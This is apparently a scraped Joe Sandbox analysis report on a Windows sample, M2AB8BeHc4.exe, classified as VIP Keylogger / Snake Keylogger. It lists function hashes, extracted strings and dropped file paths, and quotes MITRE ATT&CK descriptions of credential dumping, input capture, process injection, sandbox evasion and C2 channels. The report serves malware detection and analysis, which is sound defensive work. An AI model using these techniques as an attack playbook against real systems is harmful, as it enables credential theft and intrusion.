Source File: 00000003.00000002.4171852151.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fa0000_M2AB8BeHc4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db79c9fa538dc4a4865339a82d1cddc155af3ed969acb02766886e4573e03c4
Instruction ID: 6332a493bb6b4272c5521cb40814fb0440df19297e2293a2bedb9938ebfbbb1c
Opcode Fuzzy Hash: 2db79c9fa538dc4a4865339a82d1cddc155af3ed969acb02766886e4573e03c4
Instruction Fuzzy Hash: 9FD012B350D0605EE635414D7D45AA75B4ED6C23B5729016BFA9CE7600DC428C925164

Function 00FAAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4171852151.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fa0000_M2AB8BeHc4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ef45db66bd7869a77f1b9c663586eb1f5485c7fd38acde29624ae92a8e731ff
Instruction ID: 72eaf244350da46c772cd945c7cecdb0b49b2688e18af84e57293a78e96aec1a
Opcode Fuzzy Hash: 7ef45db66bd7869a77f1b9c663586eb1f5485c7fd38acde29624ae92a8e731ff
Instruction Fuzzy Hash: CED0673AB400189FCB149F98E8408DDF776FB98221B448116E915A3265C631A925DB60

Function 00FA6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4171852151.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fa0000_M2AB8BeHc4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42c7651feec633bac07e0581ef996e1530c593e6e3b3d70e1a99e42b1741c3be
Instruction ID: 5c6c0775e2ed97cebda1df15116e98ab4aad240996fa6664e8abf3764f5f22a3
Opcode Fuzzy Hash: 42c7651feec633bac07e0581ef996e1530c593e6e3b3d70e1a99e42b1741c3be
Instruction Fuzzy Hash: E8C012344143284EC615F765EC45656379EA7902027509920B0094654EDEB82D9557A0

Non-executed Functions

Function 00FAF759 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4171852151.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fa0000_M2AB8BeHc4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bf42551f00ea782301f6d6ad9b7ef5d27a5728a8feb765afce8ea30e1190b85
Instruction ID: 74b578685cf4205b9cb81550bf9a91bbf97ed0c0844ca2740ba12726cd551291
Opcode Fuzzy Hash: 7bf42551f00ea782301f6d6ad9b7ef5d27a5728a8feb765afce8ea30e1190b85
Instruction Fuzzy Hash: 59C1D1B4E01218CFDB14DFA5C994BADBBB2BF89300F6080A9D408AB355DB349E85DF50

Function 00FA2A69 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

Xbq, xrefs: 00FA2AD8
Xbq, xrefs: 00FA2BA4
Xbq, xrefs: 00FA2B57
Xbq, xrefs: 00FA2A9E

Memory Dump Source

Source File: 00000003.00000002.4171852151.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fa0000_M2AB8BeHc4.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: 254a390e6e24a8a2c438a72c8ffb549044e1ce67b21f1e14bdb68d4227a63df4
Instruction ID: 607cdd6ab6f4e61d93cb23a6925288ed0a686b73f7732cc64474f6da84e50fb7
Opcode Fuzzy Hash: 254a390e6e24a8a2c438a72c8ffb549044e1ce67b21f1e14bdb68d4227a63df4
Instruction Fuzzy Hash: FA3152B1E042198BDFA4CF6DC98136FB7B6BB95351F144465C409A7381DB348E81EBA2

Function 00FA6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 00FA695E
\;^q, xrefs: 00FA6952
\;^q, xrefs: 00FA692C
\;^q, xrefs: 00FA6936

Memory Dump Source

Source File: 00000003.00000002.4171852151.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fa0000_M2AB8BeHc4.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: ab62b40b34eb16620ee116c3d2d67970f7711f4578276c9dea7f4f4b2bb60508
Instruction ID: 065aae7d36399935340e41751826160c808d3d887439d026712f443a5285d30a
Opcode Fuzzy Hash: ab62b40b34eb16620ee116c3d2d67970f7711f4578276c9dea7f4f4b2bb60508
Instruction Fuzzy Hash: D901DFB6B001148FCB248E2CC448A2733EBAF8EB71729446AE446CF3B0DE31DC41A740

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report M2AB8BeHc4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\M2AB8BeHc4.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f3k1nbs3.lsl.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jizkrf2i.hpm.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qks2qhqx.nu2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x20j5onh.12m.ps1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
M2AB8BeHc4.exe

Function 04E36C10 Relevance: 6.9, Strings: 5, Instructions: 629
COMMON

Function 04E36C00 Relevance: 6.8, Strings: 5, Instructions: 568
COMMON

Function 05448D90 Relevance: 1.6, APIs: 1, Instructions: 58
nativeCOMMON

Function 054492B3 Relevance: 1.6, APIs: 1, Instructions: 56
nativeCOMMON

Function 0283B130 Relevance: 1.7, APIs: 1, Instructions: 193
COMMON

Function 04E31284 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 028345F0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 02835D04 Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Function 0283D198 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 0283D601 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Function 05448DE0 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre